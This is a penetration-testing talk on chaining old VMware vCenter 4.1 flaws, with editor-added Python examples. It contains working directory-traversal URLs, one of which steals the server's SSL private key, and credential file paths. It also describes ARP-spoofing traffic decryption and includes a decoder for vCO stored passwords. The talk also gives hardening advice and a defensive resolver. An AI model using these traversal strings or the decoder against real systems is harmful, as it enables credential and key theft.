How to hack VMware vCenter server in 60 seconds - ERPScan

17.06.2015
Invest in security to secure investments

How to hack VMware vCenter server in 60 seconds

Alexander Minozhenko


#whoami

• Pen-tester at ERPScan
• Researcher
• DCG#7812 / ZeroNights
• CTF
• Thanks for ideas and support to Alexey Sintsov


Target


VMware vCenter Server

• VMware vCenter Server is the solution for managing VMware vSphere
• vSphere – VMware's virtualization platform (the ESX/ESXi hosts that vCenter manages)


Target

• VMware vCenter version 4.1 update 1
• Services:
  – Update Manager
  – vCenter Orchestrator
  – Chargeback
  – Other
• Each service has its own web server


CVE-2009-1523

• Directory traversal in the Jetty web server
• http://target:9084/vci/download/health.xml/%3f/../../../../FILE
• Discovered by Claudio Criscione
• But fixed in VMware Update Manager 4.1 update 1 :(
• Who wants to pay me for 0-days?
• A pen-tester is not a researcher?


Directory traversal… again?

• Directory traversal in the Jetty web server
• http://target:9084/vci/download/.%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..\FILE.EXT
• %5C is the URL-encoded backslash, which Windows accepts as a path separator; the fix for CVE-2009-1523 evidently did not cover that form
• Discovered by Alexey Sintsov
• Metasploit module vmware_update_manager_traversal.rb by sinn3r
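To show why a fix that stops `/../` can still fall to `.%5C..`, here is an added example (written for this page; it is not code from the talk, from Jetty or from the Metasploit module): a naive allow-check that only knows the forward slash, next to a hardened resolver, both run against the two traversal URLs quoted on the slides. The document root `C:\srv\vci\download` and the target file names are assumptions made for the example; `/vci/download/` is the path prefix from the slides.

```python
import ntpath
from urllib.parse import unquote

# Constructed test inputs: the two traversal URLs quoted on the slides (with the
# placeholder file names kept), plus one legitimate request.  The document root
# is a hypothetical location chosen for this example.
BASE_URL = "/vci/download/"
DOC_ROOT = r"C:\srv\vci\download"
PAYLOAD_2009 = "/vci/download/health.xml/%3f/../../../../FILE"
PAYLOAD_2011 = "/vci/download/." + "%5C.." * 8 + "\\FILE.EXT"
LEGIT = "/vci/download/health.xml"


def naive_is_allowed(url_path: str) -> bool:
    """Model of a check that only knows '/' as separator: URL-decode once and
    refuse any '../' segment.  Blocks the 2009 URL, passes the backslash one."""
    decoded = unquote(url_path)
    return decoded.startswith(BASE_URL) and "../" not in decoded


def hardened_resolve(url_path: str):
    """Map a request path to a file under DOC_ROOT, or return None.

    Decodes until the string is stable (defeats double encoding), treats '\\'
    and '/' alike, refuses drive-qualified or absolute remainders, normalises
    with Windows rules and finally checks containment in the document root.
    """
    decoded = url_path
    while True:
        again = unquote(decoded)
        if again == decoded:
            break
        decoded = again
    if not decoded.startswith(BASE_URL):
        return None
    rel = decoded[len(BASE_URL):].replace("/", "\\")
    if ntpath.splitdrive(rel)[0] or rel.startswith("\\"):
        return None  # "C:..." or "\\server\share" would escape the join below
    target = ntpath.normpath(ntpath.join(DOC_ROOT, rel))
    root = ntpath.normpath(DOC_ROOT)
    inside = (target.lower() == root.lower()
              or target.lower().startswith(root.lower() + "\\"))
    return target if inside else None


if __name__ == "__main__":
    for url in (PAYLOAD_2009, PAYLOAD_2011, LEGIT):
        print(f"{url}\n  naive allows: {naive_is_allowed(url)}"
              f"\n  hardened resolves to: {hardened_resolve(url)}")
```

The hardened version never looks for `..` substrings at all: it resolves the decoded path with the target platform's rules and then asks whether the result is still under the root, which is the only check that survives new separator or encoding tricks.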


Directory traversal

• We can read any file! But what file to read?
• Claudio Criscione proposed reading vpxd-profiler-*, which contains lines like:
  /SessionStats/SessionPool/Session/Id='06B90BCB-A0A4-4B9C-B680-FB72656A1DCB'/Username='FakeDomain\FakeUser'/SoapSession/Id='AD45B176-63F3-4421-BBF0-FE1603E543F4'/Count/total 1
• It contains logs of SOAP requests with the session ID (a live session ID is as good as the password)
• VASTO http://vasto.nibblesec.org/
• Sorry, patched in 4.1!


Fixed?

• Fixed in version 4.1 update 1: the session IDs are gone from the profiler file
• But it still contains IP addresses, which is what the next attack needs


Attack

• Make an ARP poisoning attack
• Spoof the SSL certificate
• Problem: administrators check the SSL cert, so a spoofed one gets noticed

Attack

• Steal the real SSL key via directory traversal:
  http://target:9084/vci/downloads/.\..\..\..\..\..\..\..\Documents and Settings\All Users\Application Data\VMware\VMware VirtualCenter\SSL\rui.key
• Make ARP spoofing
• Decrypt the traffic with the stolen SSL key (or impersonate vCenter with it; the certificate check then passes)
• Caveat: passive decryption with the server key only works for sessions negotiated with RSA key exchange; with a forward-secret (DHE/ECDHE) cipher suite you must go active and terminate TLS yourself, which the stolen key and certificate also allow
• What if ARP spoofing does not work?


VMware vCenter Orchestrator

• VMware vCO – software for automated configuration and management
• Installed by default with vCenter
• Has an interesting file:
  C:\Program files\VMware\Infrastructure\Orchestrator\configuration\jetty\etc\passwd.properties


VMware vCenter Orchestrator

• Which contains MD5 password hashes without salt
• Unsalted MD5 is cheap to crack: identical passwords give identical hashes, and precomputed (rainbow) tables apply directly


We get in

Plain text passwords


VMware vCenter Orchestrator

• vCO stores passwords in the following files:
• C:\Program Files\VMware\Infrastructure\Orchestrator\appserver\server\vmo\conf\plugins\VC.xml
• C:\Program Files\VMware\Infrastructure\Orchestrator\appserver\server\vmo\conf\vmo.properties


VC.xml


Password encoding

006766e7964766a151e213a242665123568256c4031702d4c78454e5b575f60654b (plaintext: vmware)

00776646771786a783922145215445b62322d1a2b5d6e196a6a712d712e24726079 (plaintext: vcenter)

• The leading bytes (red on the slide) look like a length
• The following bytes (green on the slide) are in the ASCII range
• The remaining bytes (black on the slide) look random


The algorithm of password encoding

Password decoder
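The algorithm and decoder slides survive only as titles here, so the following is an added example, not the talk's decoder: it implements the layout that can be read off the two samples on the "Password encoding" slide. In both samples the first three hex digits parse as the plaintext length (006, 007), the next `length` bytes are the plaintext with the byte's position added to it (0x76 0x6e 0x79 0x64 0x76 0x6a minus 0,1,2,3,4,5 gives "vmware"), and the rest of the 32-byte body looks like random filler. That reading is an inference from two samples, and the encoder's random padding is an assumption made to mirror them.

```python
import secrets

# The two encoded values and their plaintexts exactly as shown on the slide.
SLIDE_SAMPLES = {
    "006766e7964766a151e213a242665123568256c4031702d4c78454e5b575f60654b": "vmware",
    "00776646771786a783922145215445b62322d1a2b5d6e196a6a712d712e24726079": "vcenter",
}
BODY_LEN = 32  # both samples carry 32 bytes after the length field


def split_fields(encoded: str):
    """Return (length, password bytes, filler bytes) using the layout inferred from
    the slide: a 3-hex-digit length, then `length` encoded bytes, then filler."""
    length = int(encoded[:3], 16)
    body = bytes.fromhex(encoded[3:])
    if length > len(body):
        raise ValueError("length field exceeds body")
    return length, body[:length], body[length:]


def decode_vco_password(encoded: str) -> str:
    """Undo the per-position offset: plaintext byte i was stored as (byte + i) mod 256."""
    _, enc, _ = split_fields(encoded)
    return bytes((b - i) & 0xFF for i, b in enumerate(enc)).decode("latin-1")


def encode_vco_password(plain: str, body_len: int = BODY_LEN) -> str:
    """Inverse of decode_vco_password.  The random filler is an assumption that
    mirrors the look of the samples; it plays no role in decoding."""
    raw = plain.encode("latin-1")
    if len(raw) > body_len:
        raise ValueError("password longer than body")
    enc = bytes((b + i) & 0xFF for i, b in enumerate(raw))
    filler = secrets.token_bytes(body_len - len(raw))
    return f"{len(raw):03x}" + (enc + filler).hex()


if __name__ == "__main__":
    for value, expected in SLIDE_SAMPLES.items():
        length, enc, filler = split_fields(value)
        print(f"len={length} password={enc.hex()} filler={filler.hex()}")
        print(f"  decoded: {decode_vco_password(value)!r} (slide says {expected!r})")
```

The point for defenders is that this is encoding, not encryption: nothing secret is needed to invert it, so a file-read bug on the vCO host is equivalent to a plaintext credential leak.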


VMSA-2011-0005

• VMware vCenter Orchestrator ships Struts2 version 2.11, discovered by Digital Defense, Inc
• CVE-2010-1870 – Struts2/XWork remote command execution, discovered by Meder Kydyraliev: OGNL expressions smuggled in request parameter names get evaluated server-side, which allows arbitrary Java code execution
• Fixed in 4.2


Example exploit


Tool

• Paleolib – a tool which looks for old and vulnerable third-party components
• Gets the library name, vendor name and version from the manifest file (JARs) or the resource section (PE files)
• Searches the CVE database
• http://www.github.com
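Added example of the manifest half of that approach (mine, not Paleolib's code): it builds a constructed JAR in memory, reads `Implementation-Title`/`Implementation-Version` from `META-INF/MANIFEST.MF`, and checks the version against a small vulnerability table. The table's single entry is the CVE-2010-1870 range (Struts 2.0.0 through 2.1.8.1, fixed in 2.2.1) as recalled from the Struts S2-005 advisory and the NVD entry; treat it as sample data and load real ranges from NVD/CPE in practice.

```python
import io
import re
import zipfile

# Sample vulnerability table for this example.  A real scanner loads such
# ranges from NVD/CPE data; this one entry is the S2-005 / CVE-2010-1870
# range as recalled by the author of the example.
KNOWN_VULNS = [
    {"title": re.compile(r"struts", re.I),
     "first": "2.0.0", "fixed": "2.2.1", "id": "CVE-2010-1870"},
]


def parse_version(v: str) -> tuple:
    """'2.1.8.1' -> (2, 1, 8, 1); non-numeric parts such as '-SNAPSHOT' count as 0,
    so tuple comparison orders versions the way Maven-style numbering reads."""
    return tuple(int(p) if p.isdigit() else 0 for p in re.split(r"[.\-_]", v.strip()))


def read_manifest(jar_bytes: bytes) -> dict:
    """Parse the main attributes of META-INF/MANIFEST.MF.  Continuation lines in a
    manifest start with a single space; they are joined before splitting on ':'."""
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as zf:
        text = zf.read("META-INF/MANIFEST.MF").decode("utf-8")
    text = text.replace("\r\n", "\n").replace("\n ", "")
    attrs = {}
    for line in text.split("\n"):
        if ":" in line:
            key, value = line.split(":", 1)
            attrs[key.strip()] = value.strip()
    return attrs


def scan_jar(jar_bytes: bytes) -> list:
    """Return the ids of KNOWN_VULNS entries whose range covers the JAR's version."""
    attrs = read_manifest(jar_bytes)
    title = attrs.get("Implementation-Title") or attrs.get("Bundle-SymbolicName") or ""
    version = attrs.get("Implementation-Version") or attrs.get("Bundle-Version")
    if not version:
        return []  # no version claim in the manifest: fall back to other fingerprints
    v = parse_version(version)
    return [e["id"] for e in KNOWN_VULNS
            if e["title"].search(title)
            and parse_version(e["first"]) <= v < parse_version(e["fixed"])]


def make_sample_jar(title: str, version: str) -> bytes:
    """Constructed JAR carrying the two manifest attributes Maven writes; not a real artifact."""
    manifest = (f"Manifest-Version: 1.0\r\nImplementation-Title: {title}\r\n"
                f"Implementation-Version: {version}\r\n")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF", manifest)
    return buf.getvalue()


if __name__ == "__main__":
    for ver in ("2.1.8.1", "2.2.1"):
        print(ver, "->", scan_jar(make_sample_jar("Struts 2 Core", ver)))
```

Manifests are self-declared, so a missing or vendor-rewritten version is the usual failure mode; a production scanner also hashes class files or matches pom.properties before trusting the claim.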


Attack vectors

• Directory traversal + ARP poisoning
• Directory traversal + password decoding/bruteforcing
• Remote code execution using the Struts2 bug
• Other bugs in VMware vCenter infrastructure products: Operations Management Suite, CapacityIQ, Configuration Manager etc.


Hardening

• Update to the latest version (4.2 update 4, or 5)
• Filter access to the administration services: the per-service web servers should not be reachable outside the management network
• VMware KB 2021259
• VMware vSphere Security Hardening Guide


Conclusion

• Fixed bugs are not always fixed properly
• A pen-tester gets more out of an engagement by doing some research
• A few simple bugs and we own the whole infrastructure


Thank you!

a.minozhenko@dsec.ru
@al3xmin
